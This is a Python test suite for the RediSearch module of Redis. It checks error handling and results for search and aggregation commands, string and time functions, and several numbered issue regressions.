env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', 'bad').error()
env.expect('ft.aggregate', 'idx', '*', 'LOAD', 'bad', 'test').error()
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '2', 'test').error()
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '2', '@test').error()
def testMissingArgsError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx').error()
def testUnexistsScorer(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.search', 'idx', '*', 'SCORER', 'bad').error()
def testHighlightWithUnknowsProperty(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'HIGHLIGHT', 'FIELDS', '1', 'test1').error()
def testBadFilterExpression(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'FILTER', 'blabla').error()
if not env.isCluster(): # todo: remove once fix on coordinator
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'FILTER', '@test1 > 1').error()
def testWithSortKeysOnNoneSortableValue(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.search', 'idx', '*', 'WITHSORTKEYS', 'SORTBY', 'test').equal([1L, 'doc1', '$foo', ['test', 'foo']])
def testWithWithRawIds(env):
env.skipOnCluster() # todo: remove once fix on coordinator
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
waitForIndex(env, 'idx')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.search', 'idx', '*', 'WITHRAWIDS').equal([1L, 'doc1', 1L, ['test', 'foo']])
def testUnkownIndex(env):
env.skipOnCluster() # todo: remove once fix on coordinator
env.expect('ft.aggregate').error()
env.expect('ft.aggregate', 'idx', '*').error()
env.expect('ft.aggregate', 'idx', '*', 'WITHCURSOR').error()
def testExplainError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('FT.EXPLAIN', 'idx', '(').error()
def testBadCursor(env):
env.expect('FT.CURSOR', 'READ', 'idx').error()
env.expect('FT.CURSOR', 'READ', 'idx', '1111').error()
env.expect('FT.CURSOR', 'READ', 'idx', 'bad').error()
env.expect('FT.CURSOR', 'DROP', 'idx', '1111').error()
env.expect('FT.CURSOR', 'bad', 'idx', '1111').error()
def testGroupByWithApplyError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
err = env.cmd('FT.AGGREGATE', 'idx', '*', 'APPLY', 'split()', 'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0', 'AS', 'count')[1]
assertEqualIgnoreCluster(env, str(err[0]), 'Invalid number of arguments for split')
def testSubStrErrors(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'matched_terms()', 'as', 'a', 'APPLY', 'substr(@a,0,4)')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test",3,-2)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test",3,1000)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test",-1,2)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test")', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr(1)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test", "test")', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test", "test", "test")', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test", "-1", "-1")', 'as', 'a')
env.assertTrue(env.isUp())
def testToUpperLower(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower(@test)', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'foo']])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower("FOO")', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'foo']])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper(@test)', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'FOO']])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper("foo")', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'FOO']])
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper(1)', 'as', 'a').equal([1L, ['test', 'foo', 'a', None]])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower(1)', 'as', 'a').equal([1L, ['test', 'foo', 'a', None]])
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper(1,2)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower(1,2)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
def testMatchedTerms(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'matched_terms()', 'as', 'a').equal([1L, ['test', 'foo', 'a', None]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms()', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms(100)', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms(-100)', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms("test")', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
def testStrFormatError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format("%s")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format("%", "test")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format("%b", "test")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format(5)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'upper(1)', 'as', 'b', 'APPLY', 'format("%s", @b)', 'as', 'a').equal([1L, ['test', 'foo', 'b', None, 'a', '(null)']])
# working example
env.expect('ft.aggregate', 'idx', 'foo', 'APPLY', 'format("%%s-test", "test")', 'as', 'a').equal([1L, ['a', '%s-test']])
env.expect('ft.aggregate', 'idx', 'foo', 'APPLY', 'format("%s-test", "test")', 'as', 'a').equal([1L, ['a', 'test-test']])
def testTimeFormatError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
if not env.isCluster(): # todo: remove once fix on coordinator
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test1)', 'as', 'a').error()
env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test)', 'as', 'a')
env.assertTrue(env.isUp())
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test, 4)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt("awfawf")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(235325153152356426246246246254)', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test, "%s")' % ('d' * 2048), 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'hour("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'minute("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'day("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'month("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'dayofweek("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'dayofmonth("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'dayofyear("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'year("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
def testMonthOfYear(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear(@test)', 'as', 'a').equal([1L, ['test', '12234556', 'a', '4']])
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear(@test, 112)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear("bad")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
def testParseTimeErrors(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time(11)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time(11,22)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time("%s", "%s")' % ('d' * 2048, 'd' * 2048), 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time("test", "%s")' % ('d' * 2048), 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
def testMathFunctions(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'exp(@test)', 'as', 'a').equal([1L, ['test', '12234556', 'a', 'inf']])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'ceil(@test)', 'as', 'a').equal([1L, ['test', '12234556', 'a', '12234556']])
def testErrorOnOpperation(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', '1 + split()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'split() + 1', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', '"bad" + "bad"', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'split("bad" + "bad")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', '!(split("bad" + "bad"))', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'APPLY', '!@test', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
def testSortkeyUnsortable(env):
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'test', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 'test', 'foo')
rv = env.cmd('ft.aggregate', 'idx', 'foo', 'withsortkeys',
'load', '1', '@test',
'sortby', '1', '@test')
env.assertEqual([1, '$foo', ['test', 'foo']], rv)
def testIssue919(env):
# This only works if the missing field has a lower sortable index
# than the present field..
env.cmd('ft.create', 'idx', 'ON', 'HASH',
'schema', 't1', 'text', 'sortable', 'n1', 'numeric', 'sortable')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 'n1', 42)
rv = env.cmd('ft.search', 'idx', '*', 'sortby', 't1', 'desc')
env.assertEqual([1L, 'doc1', ['n1', '42']], rv)
def testIssue1074(env):
# Ensure that sortable fields are returned in their string form from the
# document
env.cmd('ft.create', 'idx', 'ON', 'HASH',
'schema', 't1', 'text', 'n1', 'numeric', 'sortable')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello', 'n1', 1581011976800)
rv = env.cmd('ft.search', 'idx', '*', 'sortby', 'n1')
env.assertEqual([1L, 'doc1', ['n1', '1581011976800', 't1', 'hello']], rv)
def testIssue1085(env):
env.skipOnCluster()
env.cmd('FT.CREATE issue1085 ON HASH SCHEMA foo TEXT SORTABLE bar NUMERIC SORTABLE')
for i in range(1, 10):
env.cmd('FT.ADD issue1085 document_%d 1 REPLACE FIELDS foo foo%d bar %d' % (i, i, i))
res = env.cmd('FT.SEARCH', 'issue1085', '@bar:[8 8]')
env.assertEqual(toSortedFlatList(res), toSortedFlatList([1L, 'document_8', ['foo', 'foo8', 'bar', '8']]))
for i in range(1, 10):
env.cmd('FT.ADD issue1085 document_8 1 REPLACE FIELDS foo foo8 bar 8')
env.expect('ft.debug GC_FORCEINVOKE issue1085').equal('DONE')
res = env.cmd('FT.SEARCH', 'issue1085', '@bar:[8 8]')
env.assertEqual(toSortedFlatList(res), toSortedFlatList([1, 'document_8', ['foo', 'foo8', 'bar', '8']]))
def grouper(iterable, n, fillvalue=None):
"Collect data into fixed-length chunks or blocks"
from itertools import izip_longest
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(fillvalue=fillvalue, *args)
def to_dict(r):
return {r[i]: r[i + 1] for i in range(0, len(r), 2)}
def testInfoError(env):
env.expect('ft.info', 'no_idx').error()
def testIndexNotRemovedFromCursorListAfterRecreated(env):
env.expect('FT.CREATE idx ON HASH SCHEMA f1 TEXT').ok()
env.expect('FT.AGGREGATE idx * WITHCURSOR').equal([[0], 0])
env.expect('FT.CREATE idx ON HASH SCHEMA f1 TEXT').error()
env.expect('FT.AGGREGATE idx * WITHCURSOR').equal([[0], 0])
def testHindiStemmer(env):
env.cmd('FT.CREATE', 'idxTest', 'LANGUAGE_FIELD', '__language', 'SCHEMA', 'body', 'TEXT')
env.cmd('FT.ADD', 'idxTest', 'doc1', 1.0, 'LANGUAGE', 'hindi', 'FIELDS', 'body', u'अँगरेजी अँगरेजों अँगरेज़')
res = env.cmd('FT.SEARCH', 'idxTest', u'अँगरेज़')
res1 = {res[2][i]:res[2][i + 1] for i in range(0, len(res[2]), 2)}
env.assertEqual(u'अँगरेजी अँगरेजों अँगरेज़', unicode(res1['body'], 'utf-8'))
def testMOD507(env):
env.skipOnCluster()
env.expect('ft.create idx ON HASH SCHEMA t1 TEXT').ok()
for i in range(50):
env.expect('ft.add idx doc-%d 1.0 FIELDS t1 foo' % i).ok()
for i in range(50):
env.expect('del doc-%d' % i).equal(1)
res = env.cmd('FT.SEARCH', 'idx', '*', 'WITHSCORES', 'SUMMARIZE', 'FRAGS', '1', 'LEN', '25', 'HIGHLIGHT', 'TAGS', "<span style='background-color:yellow'>", "</span>")
# from redisearch 2.0, docs are removed from index when `DEL` is called
env.assertEqual(len(res), 1)
def testUnseportedSortableTypeErrorOnTags(env):
env.skipOnCluster()
env.expect('FT.CREATE idx ON HASH SCHEMA f1 TEXT SORTABLE f2 NUMERIC SORTABLE NOINDEX f3 TAG SORTABLE NOINDEX f4 TEXT SORTABLE NOINDEX').ok()
env.expect('FT.ADD idx doc1 1.0 FIELDS f1 foo1 f2 1 f3 foo1 f4 foo1').ok()
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL FIELDS f2 2 f3 foo2 f4 foo2').ok()
res = env.cmd('HGETALL doc1')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(['f1', 'foo1', 'f2', '2', 'f3', 'foo2', 'f4', 'foo2', '__score', '1.0']))
res = env.cmd('FT.SEARCH idx *')
env.assertEqual(toSortedFlatList(res), toSortedFlatList([1L, 'doc1', ['f1', 'foo1', 'f2', '2', 'f3', 'foo2', 'f4', 'foo2']]))
def testIssue1158(env):
env.cmd('FT.CREATE idx ON HASH SCHEMA txt1 TEXT txt2 TEXT txt3 TEXT')
env.cmd('FT.ADD idx doc1 1.0 FIELDS txt1 10 txt2 num1')
res = env.cmd('FT.GET idx doc1')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(['txt1', '10', 'txt2', 'num1']))
# only 1st checked (2nd returns an error)
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if @txt1||to_number(@txt2)<5 FIELDS txt1 5').equal('OK')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if @txt3&&to_number(@txt2)<5 FIELDS txt1 5').equal('NOADD')
# both are checked
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11||to_number(@txt1)>42 FIELDS txt2 num2').equal('NOADD')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11||to_number(@txt1)<42 FIELDS txt2 num2').equal('OK')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11&&to_number(@txt1)>42 FIELDS txt2 num2').equal('NOADD')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11&&to_number(@txt1)<42 FIELDS txt2 num2').equal('NOADD')
res = env.cmd('FT.GET idx doc1')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(['txt1', '5', 'txt2', 'num2']))
def testIssue1159(env):
env.cmd('FT.CREATE idx ON HASH SCHEMA f1 TAG')
for i in range(1000):
env.cmd('FT.add idx doc%d 1.0 FIELDS f1 foo' % i)
def testIssue1169(env):
env.cmd('FT.CREATE idx ON HASH SCHEMA txt1 TEXT txt2 TEXT')
env.cmd('FT.ADD idx doc1 1.0 FIELDS txt1 foo')
env.expect('FT.AGGREGATE idx foo GROUPBY 1 @txt1 REDUCE FIRST_VALUE 1 @txt2 as test').equal([1L, ['txt1', 'foo', 'test', None]])
def testIssue1184(env):
env.skipOnCluster()
field_types = ['TEXT', 'NUMERIC', 'TAG']
env.assertOk(env.execute_command('ft.config', 'set', 'FORK_GC_CLEAN_THRESHOLD', 0))
for ft in field_types:
env.assertOk(env.execute_command('FT.CREATE idx ON HASH SCHEMA field ' + ft))
res = env.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['inverted_sz_mb'], '0')
env.assertEqual(d['num_records'], '0')
value = '42'
env.assertOk(env.execute_command('FT.ADD idx doc0 1 FIELD field ' + value))
doc = env.cmd('FT.SEARCH idx *')
env.assertEqual(doc, [1L, 'doc0', ['field', value]])
res = env.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertGreater(d['inverted_sz_mb'], '0')
env.assertEqual(d['num_records'], '1')
env.assertEqual(env.execute_command('FT.DEL idx doc0'), 1)
env.cmd('ft.debug', 'GC_FORCEINVOKE', 'idx')
res = env.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['inverted_sz_mb'], '0')
env.assertEqual(d['num_records'], '0')
env.cmd('FT.DROP idx')
env.cmd('DEL doc0')
def testIndexListCommand(env):
env.expect('FT.CREATE idx1 ON HASH SCHEMA n NUMERIC').ok()
env.expect('FT.CREATE idx2 ON HASH SCHEMA n NUMERIC').ok()
res = env.cmd('FT._LIST')
env.assertEqual(set(res), set(['idx1', 'idx2']))
env.expect('FT.DROP idx1').ok()
env.expect('FT._LIST').equal(['idx2'])
env.expect('FT.CREATE idx3 ON HASH SCHEMA n NUMERIC').ok()
res = env.cmd('FT._LIST')
env.assertEqual(set(res), set(['idx2', 'idx3']))
def testIssue1208(env):
env.cmd('FT.CREATE idx ON HASH SCHEMA n NUMERIC')
env.cmd('FT.ADD idx doc1 1 FIELDS n 1.0321e5')
env.cmd('FT.ADD idx doc2 1 FIELDS n 101.11')
env.cmd('FT.ADD idx doc3 1 FIELDS n 0.0011')
env.expect('FT.SEARCH', 'idx', '@n:[1.1432E3 inf]').equal([1L, 'doc1', ['n', '1.0321e5']])
env.expect('FT.SEARCH', 'idx', '@n:[-1.12E-3 1.12E-1]').equal([1L, 'doc3', ['n', '0.0011']])
res = [3L, 'doc3', ['n', '0.0011'], 'doc2', ['n', '101.11'], 'doc1', ['n', '1.0321e5']]
env.expect('FT.SEARCH', 'idx', '@n:[-inf inf]').equal(res)
env.expect('FT.ADD idx doc3 1 REPLACE PARTIAL IF @n>42e3 FIELDS n 100').equal('NOADD')
env.expect('FT.ADD idx doc3 1 REPLACE PARTIAL IF @n<42e3 FIELDS n 100').ok()
# print env.cmd('FT.SEARCH', 'idx', '@n:[-inf inf]')
def testFieldsCaseSensetive(env):
# this test will not pass on coordinator coorently as if one shard return empty results coordinator
# will not reflect the errors
env.skipOnCluster()
conn = getConnectionByEnv(env)
env.cmd('FT.CREATE idx ON HASH SCHEMA n NUMERIC f TEXT t TAG g GEO')
# make sure text fields are case sesitive
conn.execute_command('hset', 'doc1', 'F', 'test')
conn.execute_command('hset', 'doc2', 'f', 'test')
env.expect('ft.search idx @f:test').equal([1L, 'doc2', ['f', 'test']])
env.expect('ft.search idx @F:test').equal([0])
# make sure numeric fields are case sesitive
conn.execute_command('hset', 'doc3', 'N', '1.0')
conn.execute_command('hset', 'doc4', 'n', '1.0')
env.expect('ft.search', 'idx', '@n:[0 2]').equal([1L, 'doc4', ['n', '1.0']])
env.expect('ft.search', 'idx', '@N:[0 2]').equal([0])
# make sure tag fields are case sesitive
conn.execute_command('hset', 'doc5', 'T', 'tag')
conn.execute_command('hset', 'doc6', 't', 'tag')
env.expect('ft.search', 'idx', '@t:{tag}').equal([1L, 'doc6', ['t', 'tag']])
env.expect('ft.search', 'idx', '@T:{tag}').equal([0])
# make sure geo fields are case sesitive
conn.execute_command('hset', 'doc8', 'G', '-113.524,53.5244')
conn.execute_command('hset', 'doc9', 'g', '-113.524,53.5244')
env.expect('ft.search', 'idx', '@g:[-113.52 53.52 20 mi]').equal([1L, 'doc9', ['g', '-113.524,53.5244']])
env.expect('ft.search', 'idx', '@G:[-113.52 53.52 20 mi]').equal([0])
# make sure search filter are case sensitive
env.expect('ft.search', 'idx', '@n:[0 2]', 'FILTER', 'n', 0, 2).equal([1L, 'doc4', ['n', '1.0']])
env.expect('ft.search', 'idx', '@n:[0 2]', 'FILTER', 'N', 0, 2).equal([0])
# make sure RETURN are case sensitive
env.expect('ft.search', 'idx', '@n:[0 2]', 'RETURN', '1', 'n').equal([1L, 'doc4', ['n', '1']])
